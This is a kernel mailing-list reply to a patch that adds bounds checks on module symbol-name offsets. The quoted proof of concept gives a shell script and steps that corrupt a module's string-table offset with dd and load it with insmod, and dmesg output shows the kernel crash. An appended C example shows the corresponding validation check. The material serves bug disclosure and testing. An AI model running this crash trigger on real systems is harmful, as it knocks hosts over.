On Sat, Oct 19, 2024 at 04:15:32PM +0200, Tobias Stoeckmann wrote:
> It must be verified that the symbol name offsets point into the
> string table, not outside of it.
>
> Signed-off-by: Tobias Stoeckmann <tobias@xxxxxxxxxxxxxx>
> ---
> Proof of Concept:
>
> 1. Create "poc.sh"
>
> ```
> cat > poc.sh << EOF
> #!/bin/sh
> # Sets an illegal symbol name offset in supplied uncompressed module
> # usage: ./poc file.ko
>
> MODULE="$1"
> BASE=$(readelf -S $MODULE | grep '\.symtab' | awk '{ print $5 }')
> if [ $(getconf LONG_BIT) = '64' ]
> then
>     OFF=24
> else
>     OFF=16
> fi
> ADDR=$(python -c "print(int(0x$BASE) + $OFF)")
> echo -n 'AAAA' | dd bs=1 count=4 of=$MODULE seek=$ADDR conv=notrunc
> echo $ADDR
> EOF
> ```
>
> 2. Choose a module which works for your system (adjust if compressed)
>
> ```
> cp $(find /lib/modules/$(uname -r) |grep ko$ | head -n 1) poc.ko
> ```
>
> 3. Modify module
>
> ```
> sh poc.sh poc.ko
> ```
>
> 4. Try to insert
>
> ```
> insmod poc.ko
> ```
>
> In dmesg, you can see lines like:
>
> ```
> BUG: unable to handle page fault for address: ffff9802022d6f81
> #PF: supervisor read access in kernel mode
> #PF: error_code(0x0000) - not-present page
> PGD 100000067 P4D 100000067 PUD 0
> ---

Thanks! Any chance I can convince you to write your PoC as a new test
under lib/tests/module/, see my new patch which adds a new module
dedicated test [0] which you can build upon to add a new test there.

And then you can make a series with 3 patches for this and your prior
one, and you can just refer to the PoC in the fix.

[0] https://lkml.kernel.org/r/20241021193310.2014131-1-mcgrof@xxxxxxxxxx

  Luis
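As an added illustration of the check the commit message describes (example code written for this note, not the kernel's patch or Tobias's PoC), the following applies the st_name bounds check to a constructed in-memory ELF64 symbol table; the struct, function names and sample data are assumptions, and the out-of-range offset mirrors the 'AAAA' bytes the PoC writes into the second symbol.

```c
/* Added example: validate that every symbol's st_name offset lands inside
 * the string table and that the name is NUL-terminated within it.
 * Layout below mirrors Elf64_Sym from <elf.h>; redefined to stay self-contained. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

typedef struct {
    uint32_t st_name;   /* offset into the string table */
    uint8_t  st_info;
    uint8_t  st_other;
    uint16_t st_shndx;
    uint64_t st_value;
    uint64_t st_size;
} sym64_t;

/* Returns the index of the first symbol with an invalid name offset,
 * or -1 when all name offsets are safe to dereference. */
int find_bad_symname(const sym64_t *syms, size_t nsyms,
                     const char *strtab, size_t strtab_size)
{
    for (size_t i = 0; i < nsyms; i++) {
        uint32_t off = syms[i].st_name;
        if (off >= strtab_size)
            return (int)i;   /* offset points past the end of the table */
        if (memchr(strtab + off, '\0', strtab_size - off) == NULL)
            return (int)i;   /* name is not terminated inside the table */
    }
    return -1;
}

/* Constructed sample data: "\0foo\0bar" plus its trailing NUL is 9 bytes. */
static const char sample_strtab[] = "\0foo\0bar";
static const sym64_t sample_syms[] = {
    { .st_name = 0 },            /* null symbol */
    { .st_name = 1 },            /* "foo" */
    { .st_name = 5 },            /* "bar" */
    { .st_name = 0x41414141u },  /* 'AAAA' as a little-endian uint32 */
};
/* A table that is cut off before the terminating NUL of "foo". */
static const char trunc_strtab[4] = "\0foo";

int main(void)
{
    int bad = find_bad_symname(sample_syms, 4, sample_strtab, sizeof sample_strtab);
    printf("first bad symbol index: %d\n", bad);  /* 3 */
    return 0;
}
```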